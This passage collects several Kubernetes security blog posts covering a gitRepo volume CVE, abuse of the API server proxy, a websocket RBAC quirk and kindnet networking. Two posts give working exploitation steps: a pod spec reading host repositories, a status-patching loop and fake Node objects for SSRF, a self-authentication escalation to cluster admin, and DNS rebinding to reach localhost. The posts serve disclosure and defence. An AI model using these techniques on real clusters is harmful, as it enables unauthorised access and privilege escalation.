href="https://raesene.github.io/blog/2024/07/10/Fun-With-GitRepo-Volumes/">here</a></p> <h2 id="vulnerability-and-exploitation">Vulnerability and Exploitation</h2> <p>So setting this up is relatively straightforward. Our node OS has to have <code class="language-plaintext highlighter-rouge">git</code> installed, which is common but not the case in every distribution, and we need to be able to create pods on that node. With those two pre-requisites in place, we can show how to exploit it.</p> <p>I’m going to use a <a href="https://kind.sigs.k8s.io/">kind cluster</a> , so first step is to shell into the cluster and install git, as it’s not included with kind.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind create cluster </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker exec -it kind-control-plane bash </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt update &amp;&amp; apt install -y git </code></pre></div></div> <p>Next we need a “victim” git repository, for this I’ll just clone down <a href="https://github.com/raesene/TestingScripts/">one of my repositories</a> into the root of the node’s filesystem.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/raesene/TestingScripts/ </code></pre></div></div> <p>With that setup done, exit the node shell, and then we can create our “exploit” pod. This is pretty straightforward, all we need is a pod with a <code class="language-plaintext highlighter-rouge">gitRepo</code> volume and we specify the repository to pull into the pod using a file path. As the plugin is just running git on the host, it can access that directory just fine and pull it into the pod.</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Pod</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-repo-pod-test</span> <span class="na">spec</span><span class="pi">:</span> <span class="na">containers</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-repo-test-container</span> <span class="na">image</span><span class="pi">:</span> <span class="s">raesene/alpine-containertools</span> <span class="na">volumeMounts</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-volume</span> <span class="na">mountPath</span><span class="pi">:</span> <span class="s">/tmp</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">git-volume</span> <span class="na">gitRepo</span><span class="pi">:</span> <span class="na">repository</span><span class="pi">:</span> <span class="s2">"</span><span class="s">/TestingScripts"</span> <span class="na">directory</span><span class="pi">:</span> <span class="s2">"</span><span class="s">."</span> </code></pre></div></div> <p>We can then save this as <code class="language-plaintext highlighter-rouge">gitrepotest.yaml</code> and apply it to the cluster with</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl create -f gitrepotest.yaml </code></pre></div></div> <p>If all works ok, it should be possible to check that the repository has been cloned from the node into the pod</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl exec git-repo-pod-test -- ls /tmp </code></pre></div></div> <p>This will show the files from the cloned repository!</p> <h2 id="impact--exploitability">Impact &amp; Exploitability</h2> <p>So that’s how it works, is it really a problem? My feeling is that this is quite a situational vulnerability. Essentially the attacker needs to know the path to a git repository on the node, and for it to contain files that they should not have access to. That’s not going to be be every cluster for sure, but there are times when you could see this causing problems</p> <h2 id="patching--mitigation">Patching &amp; Mitigation</h2> <p>The patching situation for this vulnerability is interesting. The CVE description says that a patch will not be provided as <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes are deprecated, which is true. However, this volume type is enabled by Kubernetes by default and there is no flag or switch that would allow a cluster operator to disable it.</p> <p>There has been an <a href="https://github.com/kubernetes/kubernetes/issues/125983">ongoing discussion</a> on disabling and/or removing this volume type since the <a href="https://github.com/kubernetes/kubernetes/issues/128885">last CVE</a> affecting this component, but a decision hasn’t currently been made on its removal.</p> <p>In practice, if you don’t use <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes, you can mitigate this in a couple of ways. If you don’t need <code class="language-plaintext highlighter-rouge">git</code> on your nodes you can just remove it there (assuming un-managed Kubernetes of course), and you can also block the use of these volumes using <a href="https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/">Validating Admission Policy</a> or similar admission controllers. There’s some details in the CVE announcement of a policy that could be used.</p> <p>One downside that you may encounter here is that I’d imagine that CVE scanners will pick up this vulnerability and as they can’t easily detect the mitigations, and as there are no patches available and all Kubernetes versions are affected, I’d expect this to flag a lot of Kubernetes installations as vulnerable.</p> <h2 id="conclusion">Conclusion</h2> <p>Whilst this is a bit of a situational vulnerability, it’s an interesting illustration of how some less well known components of Kubernetes can affect its security.</p> Fri, 14 Mar 2025 10:00:00 +0000 https://raesene.github.io/blog/2025/03/14/cve-2025-1767-another-gitrepo-issue/ https://raesene.github.io/blog/2025/03/14/cve-2025-1767-another-gitrepo-issue/ Exploring the Kubernetes API Server Proxy <p>For my first post of the year I thought it’d be interesting to look at a lesser known feature of the Kubernetes API server which has some interesting security implications.</p> <p>The Kubernetes API server can act as an HTTP proxy server, allowing users with the right access to get to applications they might otherwise not be able to reach. This is one of a number of proxies in the Kubernetes world (detailed <a href="https://kubernetes.io/docs/concepts/cluster-administration/proxies/">here</a>) which serve different purposes. The proxy can be used to access pods, services, and nodes in the cluster, we’ll focus on pods and nodes for this post.</p> <h2 id="how-does-it-work">How does it work?</h2> <p>Let’s demonstrate how this works with a <a href="https://kind.sigs.k8s.io/">KinD</a> cluster and some pods. With a standard kind cluster spun up using <code class="language-plaintext highlighter-rouge">kind create cluster</code> we can start an echo server so it’ll show us what we’re sending</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl run echoserver <span class="nt">--image</span> gcr.io/google_containers/echoserver:1.10 </code></pre></div></div> <p>Next (just to make things a bit more complex) we’ll start the <a href="https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/#directly-accessing-the-rest-api">kubectl proxy</a> on our client to let us send curl requests to the API server more easily</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl proxy </code></pre></div></div> <p>With that all in place we can use a <code class="language-plaintext highlighter-rouge">curl</code> request from our client to access the echoserver pod via the API server proxy</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/namespaces/default/pods/echoserver:8080/proxy/ </code></pre></div></div> <p>And you should get a response that looks a bit like this</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Request Information: client_address=10.244.0.1 method=GET real path=/ query= request_version=1.1 request_scheme=http request_uri=http://127.0.0.1:8080/ Request Headers: accept=*/* accept-encoding=gzip host=127.0.0.1:45745 user-agent=curl/8.5.0 x-forwarded-for=127.0.0.1, 172.18.0.1 x-forwarded-uri=/api/v1/namespaces/default/pods/echoserver:8080/proxy/ </code></pre></div></div> <p>Looking at the response from the echo server we can see some interesting items. The <code class="language-plaintext highlighter-rouge">client_address</code> is the API servers address on the pod network, and we can also see the <code class="language-plaintext highlighter-rouge">x-forwarded-for</code> and <code class="language-plaintext highlighter-rouge">x-forwarded-uri</code> headers are set too.</p> <p>Graphically the set of connections look a bit like this</p> <p><img src="https://raesene.github.io/assets/media/kube-api-proxy.png" alt="API Server Proxy" /></p> <p>In terms of how this feature works, one interesting point to note here is that it’s possible to specify the port that we’re using, so the API server proxy can be used to get to any port.</p> <p>We can also put in anything that works in a curl request and it will be relayed onwards to the proxy targets, so POST requests, headers with tokens or anything else that’s valid in curl, which makes this pretty powerful.</p> <p>It’s not just pods that we can proxy to, we can also get to any service running on a node (with an exception we’ll mention in a bit). So for example with our kind cluster setup, we can issue a curl command like</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/http:kind-control-plane:10256/proxy/healthz </code></pre></div></div> <p>and we get back the kube-proxy’s healthz endpoint information</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="nl">"lastUpdated"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-01-18 07:58:53.413049689 +0000 UTC m=+930.365308647"</span><span class="p">,</span><span class="nl">"currentTime"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2025-01-18 07:58:53.413049689 +0000 UTC m=+930.365308647"</span><span class="p">,</span><span class="w"> </span><span class="nl">"nodeEligible"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <h2 id="security-controls">Security Controls</h2> <p>Obviously this is a fairly powerful feature and not something you’d want to give to just anyone, so what rights do you need and what restrictions are there on its use?</p> <p>The user making use of the proxy requires rights to the <code class="language-plaintext highlighter-rouge">proxy</code> sub-resource of <code class="language-plaintext highlighter-rouge">pods</code> or <code class="language-plaintext highlighter-rouge">nodes</code> (N.B. Providing <code class="language-plaintext highlighter-rouge">node/proxy</code> rights also allows use of the Kubelet APIs more dangerous features).</p> <p>Additionally there is a check in the API server source code which looks to stop users of this feature from reaching localhost or link-local (e.g. <code class="language-plaintext highlighter-rouge">169.254.169.254</code>) addresses. The function <a href="https://github.com/kubernetes/kubernetes/blob/master/pkg/registry/core/node/strategy.go#L272"><code class="language-plaintext highlighter-rouge">isProxyableHost</code></a> uses the golang function <code class="language-plaintext highlighter-rouge">isGlobalUnicast</code> to check if it’s ok to proxy the requests.</p> <h2 id="bypasses-and-limitations">Bypasses and limitations</h2> <p>Now we’ve described a bit about how this feature is used and secured, let’s get on to the fun part, how can it be (mis)used :)</p> <p>Obviously a server service that lets us proxy requests, is effectively SSRF by design, so it seems likely that there’s are some interesting ways we can use it.</p> <h3 id="proxying-to-addresses-outside-the-cluster">Proxying to addresses outside the cluster</h3> <p>One thing that might be handy if you’re a pentester or perhaps CTF player is being able to use the API server’s network position to get access to other hosts on restricted networks. To do that we’d need to be able to tell the API server proxy to direct traffic to arbitrary IP addresses rather than just pods and nodes inside the cluster.</p> <p>For this we’ll go to a Kinvolk <a href="https://kinvolk.io/blog/2019/02/abusing-kubernetes-apiserver-proxying">blog post from 2019</a>, as this technique works fine in 2025!</p> <p>Essentially, if you own a pod resource you can overwrite the IP address that it has in its status and then proxy to that IP address. It’s a little tricky as the Kubernetes cluster will spot this change as a mistake and will change it back to the valid IP address, so you have to loop the requests to keep it set to the value you want.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span> <span class="nb">set</span> <span class="nt">-euo</span> pipefail <span class="nb">readonly </span><span class="nv">PORT</span><span class="o">=</span>8001 <span class="nb">readonly </span><span class="nv">POD</span><span class="o">=</span>echoserver <span class="nb">readonly </span><span class="nv">TARGETIP</span><span class="o">=</span>1.1.1.1 <span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do </span>curl <span class="nt">-v</span> <span class="nt">-H</span> <span class="s1">'Content-Type: application/json'</span> <span class="se">\</span> <span class="s2">"http://localhost:</span><span class="k">${</span><span class="nv">PORT</span><span class="k">}</span><span class="s2">/api/v1/namespaces/default/pods/</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">/status"</span> <span class="o">&gt;</span><span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-orig.json"</span> <span class="nb">cat</span> <span class="nv">$POD</span><span class="nt">-orig</span>.json | <span class="nb">sed</span> <span class="s1">'s/"podIP": ".*",/"podIP": "'</span><span class="k">${</span><span class="nv">TARGETIP</span><span class="k">}</span><span class="s1">'",/g'</span> <span class="se">\</span> <span class="o">&gt;</span><span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-patched.json"</span> curl <span class="nt">-v</span> <span class="nt">-H</span> <span class="s1">'Content-Type:application/merge-patch+json'</span> <span class="se">\</span> <span class="nt">-X</span> PATCH <span class="nt">-d</span> <span class="s2">"@</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-patched.json"</span> <span class="se">\</span> <span class="s2">"http://localhost:</span><span class="k">${</span><span class="nv">PORT</span><span class="k">}</span><span class="s2">/api/v1/namespaces/default/pods/</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">/status"</span> <span class="nb">rm</span> <span class="nt">-f</span> <span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-orig.json"</span> <span class="s2">"</span><span class="k">${</span><span class="nv">POD</span><span class="k">}</span><span class="s2">-patched.json"</span> <span class="k">done</span> </code></pre></div></div> <p>With this script looping, you can make a request like</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/namespaces/default/pods/echoserver/proxy/ </code></pre></div></div> <p>and you’ll get the response from the Target IP (in this case 1.1.1.1)</p> <h3 id="fake-node-objects">Fake Node objects</h3> <p>Another route to achieving this goal can be to create fake node objects in the cluster (assuming you’ve got the rights to do that). How well this one works depends a bit on the distribution as some will quickly clean up any fake nodes that are created, but it works fine in vanilla Kubernetes.</p> <p>What’s handy here is that we can use hostnames instead of just IP addresses so something like</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Node</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">fakegoogle</span> <span class="na">status</span><span class="pi">:</span> <span class="na">addresses</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">address</span><span class="pi">:</span> <span class="s">www.google.com</span> <span class="na">type</span><span class="pi">:</span> <span class="s">Hostname</span> </code></pre></div></div> <p>Will then allow us to issue a curl request like</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/http:fakegoogle:80/proxy/ </code></pre></div></div> <p>and get a response from <code class="language-plaintext highlighter-rouge">www.google.com</code>.</p> <h3 id="getting-the-api-server-to-authenticate-to-itself">Getting the API Server to authenticate to itself</h3> <p>An interesting variation on this idea was noted in the Kubernetes 1.24 Security audit and is currently still an <a href="https://github.com/kubernetes/kubernetes/issues/119270">open issue</a> so exploitable. This builds on the idea of a fake node by adding additional information to say that the kubelet port on this node is the same as the API server’s port. This causes the API server to authenticate to itself and allows someone with create node and node proxy rights to escalate to full cluster admin.</p> <p>A YAML like this</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Node</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">kindserver</span> <span class="na">status</span><span class="pi">:</span> <span class="na">addresses</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">address</span><span class="pi">:</span> <span class="s">172.20.0.3</span> <span class="na">type</span><span class="pi">:</span> <span class="s">ExternalIP</span> <span class="na">daemonEndpoints</span><span class="pi">:</span> <span class="na">kubeletEndpoint</span><span class="pi">:</span> <span class="na">Port</span><span class="pi">:</span> <span class="m">6443</span> </code></pre></div></div> <p>can be applied and then curl commands like the one below get access to the API server</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/https:kindserver:6443/proxy/ </code></pre></div></div> <h3 id="cve-2020-8562---bypassing-the-blocklist">CVE-2020-8562 - Bypassing the blocklist</h3> <p>Another point to note about the API server proxy is that it might be possible to bypass the blocklist that’s in place via a known, but unpatchable, CVE (There’s a great blog with details on the original CVE from the reporter <a href="https://business.blogthinkbig.com/kubernetes-vulnerability-discovered-allows-access-restricted-networks-cve-2020-8562/">here</a>).</p> <p>There is a TOCTOU vulnerability in the API servers blocklist checking that means, if you can make requests to an address you control via the API server proxy, you might be able to get the request to go to IP addresses like localhost or the cloud metadata service addresses like <code class="language-plaintext highlighter-rouge">169.254.169.254</code>.</p> <p><img src="https://raesene.github.io/assets/media/CVE-2020-8562.png" alt="CVE-2020-8562" /></p> <p>Exploiting this one takes a couple of steps. Firstly we can use a fake node object, as described in the previous section, then we’ll need a DNS service that resolves to different IP addresses alternately.</p> <p>Fortunately for us, there’s an existing service we can use for the rebinding, https://lock.cmpxchg8b.com/rebinder.html.</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Node</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">v1</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">rebinder</span> <span class="na">status</span><span class="pi">:</span> <span class="na">addresses</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">address</span><span class="pi">:</span> <span class="s">2d21209c.7f000001.rbndr.us</span> <span class="na">type</span><span class="pi">:</span> <span class="s">Hostname</span> </code></pre></div></div> <p>With that created we can use the URL below to try and access the configuration of the kube-proxy component which is only listening on localhost.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8001/api/v1/nodes/http:rebinder:10249/proxy/configz </code></pre></div></div> <p>As this is a TOCTOU it can take quite a few attempts to get a response. You should see 3 possibilities. firstly a <code class="language-plaintext highlighter-rouge">400</code> response which happens when the blocklist check fails. Secondly a <code class="language-plaintext highlighter-rouge">503</code> response where it goes to the external address (in this case the IP address for <code class="language-plaintext highlighter-rouge">scanme.nmap.org</code>) and doesn’t get a response on that URL, and lastly when the TOCTOU is successful you’ll get the response back from the proxy service. I generally have found that &lt; 30 requests is needed for a “hit” using this technique.</p> <p>One place where this particular technique is interesting is obviously cloud hosted Kubernetes clusters, and in particular managed providers where they probably don’t want cluster operators requesting localhost interfaces on machines they control :)</p> <p>To mitigate this many of the ones I’ve looked at use <a href="https://kubernetes.io/docs/tasks/extend-kubernetes/setup-konnectivity/">Konnectivity</a> which is <em>yet another</em> proxy and can be configured to ensure that any requests that come in from user controlled addresses are routed back to the node network and away from the control plane network.</p> <h2 id="conclusion">Conclusion</h2> <p>The Kubernetes API server proxy is a handy feature for a number of reasons but obviously making any service a proxy is a tricky proposition from a security standpoint.</p> <p>If you’re a cluster operator it’s important to be very careful with who you provide proxy rights to, and if you’re considering creating a managed Kubernetes service where you don’t want cluster owners to have access to the control plane, you’re going to need to be very careful with network firewalling and ensuring that the proxy doesn’t let them get to areas that should be restricted!</p> Sat, 18 Jan 2025 10:00:00 +0000 https://raesene.github.io/blog/2025/01/18/Exploring-the-Kubernetes-API-Server-Proxy/ https://raesene.github.io/blog/2025/01/18/Exploring-the-Kubernetes-API-Server-Proxy/ When is read-only not read-only? <p>Bit of a digression from the network series today, to discuss something I just saw in passing which is an interesting example of a possible sharp corner/foot gun in Kubernetes RBAC.</p> <p>Generally speaking for REST style APIs <code class="language-plaintext highlighter-rouge">GET</code> requests are read-only, so shouldn’t change the state of resources or execute commands. As such you might think that giving a user the following rights in Kubernetes would essentially just be giving them read-only access to pod information in the default namespace.</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">apiVersion</span><span class="pi">:</span> <span class="s">rbac.authorization.k8s.io/v1</span> <span class="na">kind</span><span class="pi">:</span> <span class="s">Role</span> <span class="na">metadata</span><span class="pi">:</span> <span class="na">name</span><span class="pi">:</span> <span class="s">pod-reader</span> <span class="na">namespace</span><span class="pi">:</span> <span class="s">default</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">apiGroups</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">"</span><span class="pi">]</span> <span class="na">resources</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">pods"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">pods/log"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">pods/status"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">pods/exec"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">pods/attach"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">pods/portforward"</span> <span class="na">verbs</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">get"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">list"</span><span class="pi">,</span> <span class="s2">"</span><span class="s">watch"</span><span class="pi">]</span> </code></pre></div></div> <p>However due to the details of how Websockets works with Kubernetes, this access <em>can</em> allow for users to run <code class="language-plaintext highlighter-rouge">kubectl exec</code> commands in pods and get command execution rights in that namespace! There’s information on the origins of this in <a href="https://github.com/kubernetes/kubernetes/issues/78741">this Github issue</a> but it’s essentially down to how websockets works.</p> <p>What’s possibly more interesting is that, while this behaviour has been in place for a while you might not have noticed it, as the default in Kubernetes was to use <a href="https://en.wikipedia.org/wiki/SPDY">SPDY</a> for <code class="language-plaintext highlighter-rouge">exec</code> commands instead of websockets, until Kubernetes version 1.31. So if a user with <code class="language-plaintext highlighter-rouge">GET</code> rights on <code class="language-plaintext highlighter-rouge">pods/exec</code> tried to use <code class="language-plaintext highlighter-rouge">kubectl exec</code> in 1.29 you’d get an error like this</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error from server (Forbidden): pods "test" is forbidden: User "bob" cannot create resource "pods/exec" in API group "" in the namespace "default" </code></pre></div></div> <p>but if a user with the exact same rights, tried the same command in Kubernetes 1.31 it works!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl --kubeconfig bob.config exec -it test -- /bin/bash bash-5.1# exit exit </code></pre></div></div> <p>It’s worth noting that, whilst it’s easier to do now, using websockets with these rights has been possible for a long time using tools like <a href="https://github.com/jpts/kubectl-execws">kubectl-execws</a> from <a href="https://hachyderm.io/@jpts">jpts</a>.</p> <h2 id="conclusion">Conclusion</h2> <p>Kubernetes RBAC has some tricky areas where the behaviour you get might not be exactly what you expect, and sometimes as in this case, those unexpected behaviours are not very apparent!</p> Mon, 11 Nov 2024 12:00:00 +0000 https://raesene.github.io/blog/2024/11/11/When-Is-Read-Only-Not-Read-Only/ https://raesene.github.io/blog/2024/11/11/When-Is-Read-Only-Not-Read-Only/ Exploring A Basic Kubernetes Network Plugin <p>In my <a href="https://raesene.github.io/blog/2024/11/01/The-Many-IP-Addresses-Of-Kubernetes/">last blog</a> I took a look at some of the different IP addresses that get assigned in a standard Kubernetes cluster, but an obvious follow-on question is, how do pods get those IP addresses?, and to answer that question we need to talk about network plugins.</p> <p>The Kubernetes project took the decision to delegate this part of container networking to external software, in order to make it a more flexible system that can be adapted to different use cases. The way this is done is that the project leverages the <a href="https://www.cncf.io/projects/container-network-interface-cni/">CNI</a> specification and plugins which comply with that spec. can be used to provide container networking in Kubernetes clusters.</p> <p>This means that, like many areas of Kubernetes, there’s quite a lot of possible complexity and options to consider, and over 20 different network plugins each with their own approach, so let’s start with the basics!</p> <h2 id="exploring-a-basic-cluster-set-up">Exploring a basic cluster set-up</h2> <p>We’ll make use of <a href="https://kind.sigs.k8s.io/">kind</a> to provide an initial demonstration cluster, which will give us their default network plugin <a href="https://github.com/kubernetes-sigs/kind/tree/main/images/kindnetd">kindnetd</a>. Kindnetd provide a simple CNI implementation which works well for standard kind clusters. In order to demonstrate how networking works, we’ll setup a couple of worker nodes using this config file</p> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">kind</span><span class="pi">:</span> <span class="s">Cluster</span> <span class="na">apiVersion</span><span class="pi">:</span> <span class="s">kind.x-k8s.io/v1alpha4</span> <span class="na">nodes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">role</span><span class="pi">:</span> <span class="s">control-plane</span> <span class="pi">-</span> <span class="na">role</span><span class="pi">:</span> <span class="s">worker</span> <span class="pi">-</span> <span class="na">role</span><span class="pi">:</span> <span class="s">worker</span> </code></pre></div></div> <p>Then, with that file saved as <code class="language-plaintext highlighter-rouge">kindnet-multi-node.yaml</code> we can start our test cluster with <code class="language-plaintext highlighter-rouge">kind create cluster --name=kindnet-multi-node --config=kindnet-multi-node.yaml</code>. Once the cluster’s up and running we can take a look at the networking.</p> <p>One of the first questions we might have is “how are Kubernetes network plugins configured?”. The answer is that any CNI plugins in use have a configuration file in a nominated directory, which is <code class="language-plaintext highlighter-rouge">/etc/cni/net.d</code> by default. If we look at that directory on our kind nodes we’ll see a file called <code class="language-plaintext highlighter-rouge">10-kindnet.conflist</code> which contains the configuration for the network plugin. Looking at the files in this directory is actually the most reliable way to determine which network plugin(s) are in use as there’s no direct record of it at a Kubernetes level.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"cniVersion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.3.1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"kindnet"</span><span class="p">,</span><span class="w"> </span><span class="nl">"plugins"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ptp"</span><span class="p">,</span><span class="w"> </span><span class="nl">"ipMasq"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nl">"ipam"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"host-local"</span><span class="p">,</span><span class="w"> </span><span class="nl">"dataDir"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/run/cni-ipam-state"</span><span class="p">,</span><span class="w"> </span><span class="nl">"routes"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"dst"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.0.0.0/0"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"ranges"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"subnet"</span><span class="p">:</span><span class="w"> </span><span class="s2">"10.244.2.0/24"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">,</span><span class="w"> </span><span class="nl">"mtu"</span><span class="p">:</span><span class="w"> </span><span class="mi">1500</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"portmap"</span><span class="p">,</span><span class="w"> </span><span class="nl">"capabilities"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"portMappings"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>From this configuration file we can see a bit of how the network plugin works. Firstly we see the <code class="language-plaintext highlighter-rouge">ptp</code> plugin is used. This plugin is actually one of the default ones that the CNI project maintains. What it does is create a <code class="language-plaintext highlighter-rouge">veth</code> network interface for each container, which can then be given an IP address. We can also see an <code class="language-plaintext highlighter-rouge">ipam</code> section which deals with how containers are allocated IP addresses. In this case we can see that a range of <code class="language-plaintext highlighter-rouge">10.244.2.0/24</code> is assigned to this node, and if we look at the other worker node in the cluster we see it has the <code class="language-plaintext highlighter-rouge">10.244.1.0/24</code> range,and the control plane node has <code class="language-plaintext highlighter-rouge">10.244.0.0/24</code>.</p> <p>So the next question might be “how does the traffic from a pod on one node get to a pod on another node?”. This will vary depending on the network plugin you’re using but in the case of <code class="language-plaintext highlighter-rouge">kindnet</code> it’s pretty simple. Essentially each node has the entries for the other nodes in its routing table. We can see that by running <code class="language-plaintext highlighter-rouge">ip route</code> on one of our nodes.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>default via 172.18.0.1 dev eth0 10.244.0.0/24 via 172.18.0.3 dev eth0 10.244.2.0/24 via 172.18.0.2 dev eth0 172.18.0.0/16 dev eth0 proto kernel scope <span class="nb">link </span>src 172.18.0.4 </code></pre></div></div> <p>In this file we can see that the other nodes in the cluster have IP addresses of <code class="language-plaintext highlighter-rouge">172.18.0.3</code> and <code class="language-plaintext highlighter-rouge">172.18.0.2</code> respectively, and the container subnets are routed to those nodes.</p> <p>We can also see how traffic gets to individual pods on that node. First let’s create a deployment with 4 replicas <code class="language-plaintext highlighter-rouge">kubectl create deployment webserver --image=nginx --replicas=4</code>. Once we’ve got that setup, we can run the <code class="language-plaintext highlighter-rouge">ip route</code> command again to see what effect that has had.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>default via 172.18.0.1 dev eth0 10.244.0.0/24 via 172.18.0.2 dev eth0 10.244.1.2 dev vethc2e31815 scope host 10.244.1.3 dev veth2621a4f6 scope host 10.244.2.0/24 via 172.18.0.3 dev eth0 172.18.0.0/16 dev eth0 proto kernel scope <span class="nb">link </span>src 172.18.0.4 </code></pre></div></div> <p>We can see two new entries in our routing table for the two containers that got started on this worker node, showing how traffic would be sent to the container once it reaches the node.</p> <h2 id="conclusion">Conclusion</h2> <p>This was a quick look at a very simple CNI implementation, and how it all works will vary depending on the network plugin(s) you use. If you’re looking for a more in-depth treatment of what we’ve discussed here, I’d recommend <a href="https://www.tkng.io/">The Kubernetes Networking Guide</a> which has a lot of information on this topic and 